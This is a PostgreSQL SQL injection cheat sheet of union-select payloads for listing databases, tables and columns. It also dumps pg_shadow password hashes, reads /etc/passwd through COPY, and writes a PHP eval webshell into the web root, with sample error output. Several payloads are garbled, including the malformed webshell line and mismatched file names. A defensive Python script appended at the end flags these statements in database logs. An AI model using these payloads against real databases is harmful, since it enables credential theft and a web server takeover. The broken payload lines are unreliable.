PostgreSQL Injection Syntax Guide

Author: Nana
I apologize that this article contains no real instances.
For someone who is not good at using Google, it is not easy to find a PostgreSQL injection instance.
Only plain statements and their echoed output are used as examples.
Across SQL database software, whether MSSQL, MySQL, Oracle, Access, Informix, Firebird or DB2, the SQL logic and syntax remain the same. Even so, we do not recommend that beginners to injection refer to this article, because I will not explain every function or piece of syntax.
For a novice, reading this article directly will certainly be difficult, since it has no examples. For anyone who understands SQL statements, however, it is quite easy.
 
 
 
--------------------------------------------------------------------------------
Several kinds of statement are commonly used in injection:
-- Display the version
-- Dump data from a known table and column
-- List databases
-- List tables in the database
-- List columns in a table
-- Read configuration information, such as database login accounts and passwords
-- Read and write files
I will go through the PostgreSQL syntax for each in turn.
 
 
-- Display the version
select version();
union select 1,2,...n,version()
// The version() function is the same as in MySQL.
Example of echoed data:
PostgreSQL 8.1.18 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-46)
 
-- Dump data from a known table and column
select aa from bb where cc = dd;
union select 1,2,...n,aa from bb where cc = dd
// Almost every SQL dialect uses this same syntax to dump data.
No example
 
-- List databases
select datname from pg_database;
union select 1,2,...,n,datname from pg_database;
Echo example:
Postgres, prc, template1, template0
 
-- List tables in the database
select relname from pg_stat_user_tables limit 1 offset n;
// Similar to information_schema.tables in MySQL, although the comparison is not exact
union select relname from pg_stat_user_tables limit 1 offset 3;
// limit 1 offset 0 is the same as limit 0,1 in MySQL.
No example
 
-- List columns in a table
select column_name from information_schema.columns where table_name = 'xxx' limit 1 offset n;
union select 1,2,...,n,column_name from information_schema.columns where table_name = 0x3a limit 1 offset 5
// Same as MySQL
 
-- Read configuration information, such as database login accounts and passwords
select usename, passwd from pg_shadow;
union select 1,2,...n,usename,passwd from pg_shadow
// pg_shadow is similar to the mysql database in MySQL.
The root account is ipvs.
Echo example:
Postgres 9d2e7638fd7c7e433f0074a8f65cfd3a
 
-- Read files
copy test from '/etc/passwd' with delimiter E'\t';
(Note: Most PostgreSQL statements found on the Internet use double quotation marks. In actual tests on 8.x to 9.x, double quotation marks are invalid; single quotation marks should be used.)
Echo example:
Query failed: ERROR: extra data after last expected column CONTEXT: COPY file, line 1: "root: x: 0: 0: root:/bin/bash"
 
-- Write files
Insert into test values ('<? Php eval ($ _ POST ["cmd"];?> ');
Copy test (code) to "/var/www/one. php ";
Echo example:
Query failed: ERROR: could not open file "/var/www/html/aaa.php" for writing: Permission denied
pg_file_read() is not as easy to use as load_file() in MySQL.
For example:
select pg_file_read('pg_hba.conf', 1, pg_file_length('pg_hb.conf'));
Echo:
Query failed: ERROR: function pg_file_length ("unknown") does not exist HINT: No function matches the given name and argument types. You may need to add explicit type casts.
 
I am not familiar with PostgreSQL either, so I will leave it here.
// Blackbap.org
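
On the defending side, every statement family listed above names a specific catalog or file operation, which makes it detectable in the PostgreSQL statement log. The following is an added example, not code from the original article: a triage script that flags those catalog reads and server-side file COPY statements. The log_line_prefix format, the role names and the sample log lines are assumptions constructed for illustration.

```python
import re

# Assumes log_statement = 'all' and log_line_prefix = '%m [%p] user=%u db=%d '.
LINE = re.compile(r"user=(?P<user>\S+) db=\S+ LOG:\s+statement: (?P<sql>.*)$")
APP_ROLES = {"webapp"}  # hypothetical web application role; it never needs catalogs
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

# Catalog reads from the article; routine for monitoring roles, not for APP_ROLES.
RECON = {
    "version_probe": re.compile(r"\bversion\s*\(\s*\)", re.I),
    "database_list": re.compile(r"\bpg_database\b", re.I),
    "table_list": re.compile(r"\bpg_stat_user_tables\b", re.I),
    "column_list": re.compile(r"\binformation_schema\s*\.\s*columns\b", re.I),
}
# Credential and server-side file access from the article; flagged for any role.
# The COPY rule needs a quoted server path, so COPY ... FROM STDIN is left alone.
CRITICAL = {
    "credential_read": re.compile(r"\bpg_shadow\b", re.I),
    "server_file_copy": re.compile(r"\bcopy\s[^;]*?\b(?:from|to)\s+E?['\"]", re.I),
    "file_read_function": re.compile(r"\bpg_file_read\s*\(", re.I),
}

def classify(line):
    """Return (severity, role, matched rule names) for a log line, or None."""
    m = LINE.search(line)
    if not m:
        return None
    role, sql = m["user"], m["sql"]
    critical = [name for name, rx in CRITICAL.items() if rx.search(sql)]
    recon = [name for name, rx in RECON.items() if rx.search(sql)]
    if critical:
        return ("critical", role, critical + recon)
    if recon and role in APP_ROLES:
        return ("high" if UNION.search(sql) else "review", role, recon)
    return None

def scan(lines):
    return [finding for finding in map(classify, lines) if finding]

P = "2024-05-01 10:00:00.000 UTC [4121] user=%s db=shop LOG:  statement: %s"
SAMPLE_LOG = [  # constructed log lines, not taken from a real system
    P % ("webapp", "select name from products where id = 7"),
    P % ("webapp", "select name from products where id = 7 union select datname from pg_database"),
    P % ("monitor", "select relname, n_live_tup from pg_stat_user_tables"),
    P % ("webapp", "select name from products where id = 1 union select passwd from pg_shadow"),
    P % ("webapp", r"copy test from '/etc/passwd' with delimiter E'\t'"),
    P % ("etl", "copy orders from stdin"),
    P % ("webapp", "select version()"),
]
```

Calling scan(SAMPLE_LOG) returns four findings; the monitoring role's catalog query and the COPY ... FROM STDIN load are not reported.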
